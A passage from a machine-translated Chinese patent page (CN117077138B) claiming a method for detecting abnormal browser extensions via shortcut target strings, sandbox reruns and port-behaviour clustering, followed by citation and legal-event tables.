matching the abnormality judgment character strings with the character strings in the resource files of the expansion programs respectively;
if the matching is successful, determining that the extension program corresponding to the resource file which is successfully matched is an abnormal extension program;
if only a preset character string exists in the target character string, sequentially carrying out static detection and dynamic detection on security holes by each extension program to generate a security detection result of each extension program;
determining an abnormal extension program according to the safety detection result of each extension program;
After determining the exception extension procedure, the method further comprises:
the abnormal extension program is put into a sandbox to run again, and resource information corresponding to the process of downloading resources in the running process is obtained;
according to the resource information, performing anomaly detection on the target terminal; the target terminal is a terminal provided with the browser to be tested.
2. The method of claim 1, wherein obtaining the target address linked to the browser shortcut file to be tested comprises:
decoding a to-be-detected browser shortcut file to generate hexadecimal file codes corresponding to the to-be-detected browser shortcut file;
and acquiring the target address from a preset coding region in the hexadecimal file coding.
3. The method according to claim 1, wherein before taking the other character string as the abnormality determination character string if the other character string is present in the target character string in addition to the preset character string, the method further comprises:
acquiring total number K of characters in target character string 1 ;
Acquiring the total number A of characters contained in each preset character string 1 、A 2 、…、A i 、…、A z The method comprises the steps of carrying out a first treatment on the surface of the Wherein A is i For the total number of characters contained in the ith preset character string, z is the total number of the preset character strings, i=1, 2, … and z;
If Max (A) 1 、A 2 、…、A i 、…、A z )≤K 1 And comparing each preset character string with the target character string.
4. A method according to claim 3, wherein comparing each of the predetermined strings with the target string comprises:
determining a target matching interval in the target character string, wherein the length of the target matching interval is the same as that of a corresponding preset character string, and the initial position of the target matching interval is the first character in the target character string;
and comparing the preset character string with the character string in the corresponding target matching interval.
5. The method of claim 1, wherein after determining the exception extension program, the method further comprises:
acquiring a plurality of acquisition terminals; each acquisition terminal is respectively provided with an acquisition browser developed based on a Chromium browser, and one acquisition browser only comprises an abnormal extension program;
acquiring a port state vector and a port behavior set acquired by each acquisition terminal; wherein B is j For the port state vector acquired by the jth acquisition terminal, B j =(B j 1 、B j 2 、…、B j n 、…、B j y );B j n The state value of the nth port in the jth acquisition terminal is given, y is the number of ports in each acquisition terminal, and n=1, 2, … and y; wherein C is j C, for the port behavior set acquired by the j-th acquisition terminal j =(C j 1 、C j 2 、…、C j n 、…、C j y ),C j n C is the behavior feature vector corresponding to the nth port in the jth acquisition terminal j n =(C j n1 、C j n2 、…、C j nm 、…、C j nx ) The method comprises the steps of carrying out a first treatment on the surface of the Wherein C is j nm The method comprises the steps that the number of the m-th preset instruction type instructions appears in one abnormal behavior acquired by an n-th port in a j-th acquisition terminal; x is the total number of preset instruction types, m=1, 2, …, x;
clustering all port state vectors to generate a plurality of cluster groups;
obtaining a center vector corresponding to each cluster group;
port behavior sets corresponding to all port state vectors included in each cluster group are respectively added into corresponding feature sets, and abnormal behavior feature sets corresponding to each cluster group are generated;
and generating a judging sample set corresponding to each abnormal expansion program according to the central vector and the abnormal behavior characteristic set corresponding to each cluster group.
6. The method of claim 5, wherein obtaining the port state vector collected by each collection terminal comprises:
acquiring a state value of each port of an acquisition terminal in one acquisition period; the acquisition period is a period corresponding to the completion of one abnormal behavior of the abnormal extension program;
If the port is in an opened state in one acquisition period, configuring a first state value for the port;
and if the port is in a closed state all the time in one acquisition period, configuring a second state value for the port.
7. A browser-based anomaly detection device, the device comprising:
the address acquisition module is used for acquiring a target address linked with the shortcut file of the browser to be tested; the browser to be tested is a browser developed based on a Chromium browser, and a plurality of extension programs are installed in the browser to be tested;
character acquisition module: the method comprises the steps of obtaining a target character string, wherein the target character string is a character string after the last preset separator in a target address;
the abnormality judging module is used for taking other character strings as abnormality judging character strings if the target character string has other character strings except the preset character string;
the abnormality positioning module is used for performing abnormality positioning processing on a plurality of expansion programs according to the abnormality judgment character string to determine an abnormal expansion program;
the abnormality judgment character string is a character string corresponding to the resource downloading instruction;
the exception positioning process comprises the following steps:
Acquiring a resource file of each extension program; the resource file comprises a main function file and a sub function file which correspond to the extension program;
matching the abnormality judgment character strings with the character strings in the resource files of the expansion programs respectively;
if the matching is successful, determining that the extension program corresponding to the resource file which is successfully matched is an abnormal extension program;
if only a preset character string exists in the target character string, sequentially carrying out static detection and dynamic detection on security holes by each extension program to generate a security detection result of each extension program;
determining an abnormal extension program according to the safety detection result of each extension program;
after determining the abnormal extension program, putting the abnormal extension program into a sandbox to run again, and acquiring corresponding resource information when downloading resources in the running process;
according to the resource information, performing anomaly detection on the target terminal; the target terminal is a terminal provided with the browser to be tested.
8. A non-transitory computer readable storage medium storing a computer program, wherein the computer program when executed by a processor implements a browser-based anomaly detection method according to any one of claims 1 to 6.
9. An electronic device comprising a memory, a processor and a computer program stored in the memory and executable on the processor, wherein the processor implements a browser-based anomaly detection method according to any one of claims 1 to 6 when the computer program is executed.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202311056058.3A CN117077138B (en) | 2023-08-21 | 2023-08-21 | Anomaly detection method, system, medium and equipment based on browser |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202311056058.3A CN117077138B (en) | 2023-08-21 | 2023-08-21 | Anomaly detection method, system, medium and equipment based on browser |
Publications (2)
| Publication Number | Publication Date |
|---|---|
| CN117077138A CN117077138A (en) | 2023-11-17 |
| CN117077138B true CN117077138B (en) | 2024-03-08 |
Family
ID=88703841
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN202311056058.3A Active CN117077138B (en) | 2023-08-21 | 2023-08-21 | Anomaly detection method, system, medium and equipment based on browser |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN117077138B (en) |
Citations (3)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN102375951A (en) * | 2011-10-18 | 2012-03-14 | 北龙中网(北京)科技有限责任公司 | Webpage security detection method and system |
| CN114329459A (en) * | 2021-11-18 | 2022-04-12 | 奇安信科技集团股份有限公司 | Browser protection method and device |
| CN115562992A (en) * | 2022-10-09 | 2023-01-03 | 北京安天网络安全技术有限公司 | File detection method and device, electronic equipment and storage medium |
Family Cites Families (2)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US20070174286A1 (en) * | 2005-05-17 | 2007-07-26 | Yahoo!, Inc. | Systems and methods for providing features and user interface in network browsing applications |
| US20180343174A1 (en) * | 2012-10-09 | 2018-11-29 | Google Inc. | Rule based page processing and network request processing in browsers |
-
2023
- 2023-08-21 CN CN202311056058.3A patent/CN117077138B/en active Active
Patent Citations (3)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN102375951A (en) * | 2011-10-18 | 2012-03-14 | 北龙中网(北京)科技有限责任公司 | Webpage security detection method and system |
| CN114329459A (en) * | 2021-11-18 | 2022-04-12 | 奇安信科技集团股份有限公司 | Browser protection method and device |
| CN115562992A (en) * | 2022-10-09 | 2023-01-03 | 北京安天网络安全技术有限公司 | File detection method and device, electronic equipment and storage medium |
Also Published As
| Publication number | Publication date |
|---|---|
| CN117077138A (en) | 2023-11-17 |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| US10956477B1 (en) | System and method for detecting malicious scripts through natural language processing modeling | |
| US10581879B1 (en) | Enhanced malware detection for generated objects | |
| JP4676499B2 (en) | Exploit code detection in network flows | |
| EA037617B1 (en) | Method and system for detecting an intrusion in data traffic on a data communication network | |
| EP3654216A1 (en) | Computer-security event security-violation detection | |
| US9239922B1 (en) | Document exploit detection using baseline comparison | |
| EP3637292B1 (en) | Determination device, determination method, and determination program | |
| US20230252136A1 (en) | Apparatus for processing cyber threat information, method for processing cyber threat information, and medium for storing a program processing cyber threat information | |
| CN115766184A (en) | Webpage data processing method and device, electronic equipment and storage medium | |
| Jacob et al. | Malware behavioral detection by attribute-automata using abstraction from platform and language | |
| CN111428239A (en) | Detection method of malicious mining software | |
| CN113067792A (en) | XSS attack identification method, device, equipment and medium | |
| Alasmary et al. | SHELLCORE: Automating malicious IoT software detection using shell commands representation | |
| CN114070642A (en) | Network security detection method, system, device and storage medium | |
| US20240054210A1 (en) | Cyber threat information processing apparatus, cyber threat information processing method, and storage medium storing cyber threat information processing program | |
| CN117077138B (en) | Anomaly detection method, system, medium and equipment based on browser | |
| EP3522488B1 (en) | Automatic decoy derivation through patch transformation | |
| US20230048076A1 (en) | Cyber threat information processing apparatus, cyber threat information processing method, and storage medium storing cyber threat information processing program | |
| US20230254340A1 (en) | Apparatus for processing cyber threat information, method for processing cyber threat information, and medium for storing a program processing cyber threat information | |
| KR102411383B1 (en) | Apparatus for processing cyber threat information, method for processing cyber threat information, and medium for storing a program processing cyber threat information | |
| Usui et al. | Ropminer: Learning-based static detection of rop chain considering linkability of rop gadgets | |
| CN116760644B (en) | Terminal abnormality judging method, system, storage medium and electronic equipment | |
| US20240054215A1 (en) | Cyber threat information processing apparatus, cyber threat information processing method, and storage medium storing cyber threat information processing program | |
| CN116910756B (en) | Detection method for malicious PE (polyethylene) files | |
| US20240211595A1 (en) | Cyber threat information processing apparatus, cyber threat information processing method, and storage medium storing cyber threat information processing program |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| PB01 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| GR01 | Patent grant | ||
| GR01 | Patent grant |